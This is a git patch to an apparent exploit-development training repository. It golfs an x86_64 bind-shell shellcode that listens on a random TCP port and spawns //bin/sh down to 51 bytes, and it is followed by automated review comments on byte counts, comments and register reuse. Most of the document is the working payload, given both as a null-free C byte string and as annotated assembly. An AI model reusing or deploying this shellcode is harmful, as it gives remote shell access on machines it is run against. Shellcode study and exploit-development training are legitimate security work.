From a2775f246f6552aab28766b89d2318821ebbcdb2 Mon Sep 17 00:00:00 2001
From: "Geyslan G. Bem"
Date: Sat, 3 Apr 2021 11:37:01 -0300
Subject: [PATCH] shorter and shorter
Signed-off-by: Geyslan G. Bem
---
...ell_bind_tcp_random_port_shellcode_x86_64.c | 12 ++++++------
.../tiny_shell_bind_tcp_random_port_x86_64.asm | 18 +++++++++---------
2 files changed, 15 insertions(+), 15 deletions(-)
diff --git a/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c b/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c
index c80b147..7e31d32 100644
--- a/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c
+++ b/improvements/tiny_shell_bind_tcp_random_port_shellcode_x86_64.c
@@ -28,7 +28,7 @@ assembly source: https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
- * 52 bytes
+ * 51 bytes
* null-free
@@ -54,11 +54,11 @@ int main(void)
const char code[] = "\x6a\x29\x58\x99\x6a\x01\x5e\x6a\x02\x5f"
- "\x0f\x05\x52\x5e\x97\xb0\x32\x0f\x05\xb0"
- "\x2b\x0f\x05\x97\x96\xff\xce\x6a\x21\x58"
- "\x0f\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62"
- "\x69\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b"
- "\x0f\x05";
+ "\x0f\x05\x97\xb0\x32\x0f\x05\x96\xb0\x2b"
+ "\x0f\x05\x97\x96\xff\xce\x6a\x21\x58\x0f"
+ "\x05\x75\xf7\x52\x48\xbf\x2f\x2f\x62\x69"
+ "\x6e\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x0f"
+ "\x05";
// When contains null bytes, printf will show a wrong shellcode length.
printf("Shellcode Length: %ld\n", strlen(code));
diff --git a/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm b/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
index 0309270..2056dba 100644
--- a/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
+++ b/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm
@@ -37,7 +37,7 @@
; tiny_shell_bind_tcp_random_port_x86_64
;
-; * 52 bytes
+; * 51 bytes
; * null-free
;
;
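Review bot: The new byte string is kept in sync with the assembler output by hand, and nothing in the file checks that the two agree; now that the header comment pins the length at 51, a compile-time check next to the declaration would catch the next drift: `_Static_assert(sizeof(code) - 1 == 51, "shellcode length");` (C11). The length printed on the context line comes from strlen(), which is only right because the payload is null-free, as the comment above it concedes; `printf("Shellcode Length: %zu\n", sizeof(code) - 1);` has no such dependency and uses the conversion that matches size_t. For the record, decoding the bytes gives 10 context bytes plus 41 added ones, 51 in total, with no 0x00 among them, so the comment and the null-free claim hold. main() continues outside the hunk.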
@@ -90,11 +90,9 @@ _start:
; Preparing to listen the incoming connection (passive socket)
; int listen(int sockfd, int backlog);
- ; listen(sockfd, int);
+ ; listen(sockfd, 1);
- ; listen arguments
push rdx ; put zero into rsi
pop rsi
+ ; listen arguments ; just let rsi (backlog) as 1 - man(2) listen
xchg eax, edi ; put the file descriptor returned by socket() into rdi
@@ -106,8 +104,9 @@ _start:
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
; accept(sockfd, NULL, NULL)
- ; accept arguments ; here we need only do nothing, the rdi already contains the sockfd,
- ; likewise rsi and rdx contains 0
+ ; accept arguments ; rdi already contains the sockfd, likewise rdx contains 0
+
+ xchg eax, esi ; put listen() return (0) into rsi
mov al, 43 ; syscall 43 - accept
syscall ; kernel interruption
@@ -132,16 +131,17 @@ dup_loop:
; Finally, using execve to substitute the actual process with /bin/sh
; int execve(const char *filename, char *const argv[], char *const envp[]);
- ; exevcve("/bin/sh", NULL, NULL)
+ ; exevcve("//bin/sh", NULL, NULL)
; execve string argument ; *envp[] rdx is already NULL ; *argv[] rsi is already NULL
push rdx ; put NULL terminating string
mov rdi, 0x68732f6e69622f2f ; "//bin/sh"
- push rdi ; push /bin/sh string
+ push rdi ; push //bin/sh string
push rsp ; push the stack pointer
pop rdi ; pop it (string address) into rdi
mov al, 59 ; execve syscall
syscall ; bingo
+
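Review bot: The backlog now comes from rsi still holding the 1 loaded for socket()'s SOCK_STREAM argument (the `6a 01 5e` push 1 / pop rsi visible in the C file's context bytes), but that load is above this hunk and the rewritten comment only asserts that rsi is 1 without saying where it comes from, so a later reordering of the socket() setup would silently turn the backlog into whatever rsi holds. Suggested wording for the added line: `; listen arguments ; rsi still holds 1 (SOCK_STREAM) from the socket() call above - reused as backlog`. The removed `push rdx / pop rsi` was also the only explicit zeroing of rsi before accept(), so a one-line cross-reference to where that 0 now comes from would help. _start continues outside the hunk.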
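Review bot: The added `xchg eax, esi` makes accept()'s addr argument correct only on listen()'s success path: a failed listen() leaves a negative errno in eax, and the 32-bit xchg zero-extends it into rsi as a non-NULL value, so accept() would then be called with a bogus addr and a NULL addrlen instead of (NULL, NULL). The `push rdx / pop rsi` zeroing this commit removes in the listen hunk had no such dependency. For a size-golfed payload that checks no return value anywhere this is a fair one-byte trade, but the comment should record the assumption rather than state it as a fact: `xchg eax, esi ; rsi = listen() return, assumed 0 (no error check; a failed listen() would leave a non-NULL addr here)`. The syscall number is unaffected, since the xchg leaves rax = 1 before `mov al, 43`. _start continues outside the hunk.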
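Review bot: The rewritten comment line keeps the typo in the function name: `; exevcve("//bin/sh", NULL, NULL)` should read `; execve("//bin/sh", NULL, NULL)`. The doubled slash is the usual way to fill the 8-byte `mov rdi, 0x68732f6e69622f2f` immediate without a NUL, and path resolution collapses it to /bin/sh; a short `; doubled slash: 8 bytes, no NUL` next to the mov would spare the next reader a trip to the byte listing. The trailing added blank line at end of file is cosmetic. dup_loop's body continues above the hunk.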